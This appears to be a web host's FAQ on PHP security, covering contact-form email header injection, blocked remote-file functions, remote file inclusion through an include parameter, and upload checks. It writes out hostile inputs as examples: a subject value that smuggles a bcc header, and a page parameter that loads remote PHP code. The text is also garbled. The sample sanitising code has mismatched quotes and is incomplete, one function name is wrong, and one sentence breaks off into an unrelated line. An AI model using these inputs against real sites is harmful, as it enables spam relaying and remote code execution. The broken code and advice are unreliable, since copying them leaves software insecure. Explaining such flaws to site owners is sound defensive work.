Frequently Asked Questions

Lately, it happens more often that there is abuse of standard contact forms. An example:

A contact consists of the fields:
  • Name (1 line)
  • Email address (1 line)
  • Subject (1 line)
  • Message (multiline).

    The "Subject" field will appear in the subject. An example of a PHP command to send mail from this form may look like this:

    mail ("info@mywebsite.com", $subject, $message);

    The headers of this email will then look like this:
    To: info@mywebsite.com
    Subject: $subject


    With spam form injection the subject is introduced as follows:
    subject=This is the subject \nbcc: test@test.com

    The headers will then look like this:
    To: info@mywebsite.com
    Subject: This is the subject
    bcc: test@test.com

    This email is then sent not only to info@mywebsite.com but also to test@test.com and possibly multiple addresses entered.

    We would therefore ask everyone to make sure to protect their contact form. A good plan to use this counter is to check the characters \n and \r when the field should not consist of more than one line.

    Example:
    $subject = str_replace ("\r\n ','', $_POST ['subject']);
  • Because in many standard scripts (eg. Joomla) exploits are possible where external code can be executed to cause damage, we have decided to disallow to open files from other Web sites from PHP. This applies to the following commands:
  • fopen
  • include
  • requirement
  • include_once
  • require_once
  • file

    Of course there are plenty of reasons your website might need to load files from external webservers. If your web site also requires this,
    We don't support ASP.
  • Many people load pages by using a template and load it to a file.
    EG: index.php page = voorpagina.php?

    The file "voorpagina.php" is then loaded through an include.

    Do not do this! By filling in: index.php?page=http: //www.test.com/phpcode.php can allow the user to perform remote code through your script, this is very dangerous!

    It is better to work with a header and footer, but if this is not appropriate, it is better to check if the file is on the current server, for example to see if there is a ":" in the $page variable.
    If you allow visitors to upload files, you must make sure that no malicious PHP and other code can be uploaded.

    Therefore, check the file extension of the file that is uploaded, so for example .php is not possible!